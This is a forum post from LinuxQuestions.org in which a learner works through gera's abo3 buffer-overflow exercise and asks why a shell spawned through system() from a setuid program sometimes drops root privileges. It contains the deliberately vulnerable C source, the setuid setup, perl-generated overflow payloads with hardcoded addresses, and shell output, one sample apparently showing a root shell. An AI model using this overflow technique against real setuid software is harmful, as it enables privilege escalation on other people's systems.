LinuxQuestions.org - Does system drop privaleges

Ok im exploiting a simple program by overwriting a function ptr with the address of system. I am passing "/bin/sh" to that. I had expected to end up with the same privaleges as i had before as I was under the impression that system() executes programs using /bin/sh which apparently drops priveleges. I wasnt disappointed in this regard

Code:



/* abo3.c                                      *

 * specially crafted to feed your brain by gera */



/* This'll prepare you for The Next Step        */



int main(int argv,char **argc) {

        extern system,puts; 

        void (*fn)(char*)=(void(*)(char*))&system;

        char buf[256];



        fn=(void(*)(char*))&puts;

        strcpy(buf,argc[1]);

        fn(argc[2]);

        exit(1);

}

Quote:

nnp@torvalds:~/coding/geras/abo$ sudo chmod +s abo3
nnp@torvalds:~/coding/geras/abo$ ls -al
total 40
drwxr-xr-x 2 nnp users 4096 2006-05-18 21:03 .
drwxr-xr-x 3 nnp users 4096 2006-05-18 19:52 ..
-rwsr-sr-x 1 root root 11991 2006-05-18 20:50 abo3
-rw-r--r-- 1 nnp users 219 2006-05-18 19:53 abo3.c
-rwxr-xr-x 1 nnp users 11685 2006-05-18 21:03 test
-rw-r--r-- 1 nnp users 97 2006-05-18 20:05 test.c
nnp@torvalds:~/coding/geras/abo$ ./abo3 `perl -e 'print "\x60\x57\xef\xb7"x68'` "/bin/sh"
sh-3.00$ id
uid=1000(nnp) gid=100(users) groups=6(disk),10(wheel),17(audio),18(video),19(cdrom),100(users)
sh-3.00$

I was then talking to a friend of mine who said I was wrong and that /bin/sh did not drop privs. He showed me his output

Quote:

$ ls -al ./abo3 ; ./abo3 `perl -e 'print "\xc8\x61\xee\xb7" x 68'` "/bin/sh"
ykram -rwsr-xr-x 1 root root 11771 2006-05-18 15:09 ./abo3
ykram sh-3.00# whoami
ykram root

He is quite adamant that using the same method he ends up with an effective uid of 0. The man page has this to say on the matter

Quote:

system() will not, in fact, work properly from programs with suid or sgid privileges on systems on which /bin/sh is bash version 2, since bash 2 drops privileges on startup.

Both me and my friend are both using the same version though,

Quote:

Although his doesnt have the slackware specific part.

The thing is. If im root and run /bin/sh then in sh run /bin/sh again the prompt i get is still root so its quite obviously not dropping privs then but if i use the following program it does drop privs. Aghghh!!!!

Code:

nnp@torvalds:~$ ls -al | grep test | grep -v test.c | grep -v contest

-rwsr-sr-x  1 root root    15125 2006-05-19 19:06 test

nnp@torvalds:~$ cat test.c 

#include <stdlib.h>



int main() {

        system("/bin/sh");

        return 0;

}

nnp@torvalds:~$ ./test  

sh-3.00$ i

sh: i: command not found

sh-3.00$ id

uid=1000(nnp) gid=100(users) groups=6(disk),10(wheel),17(audio),18(video),19(cdrom),100(users)

sh-3.00$

also for some reason when i run the above program it takes the first letter i type as a command as if i pressed return...odd..

Anyone know what im misunderstanding?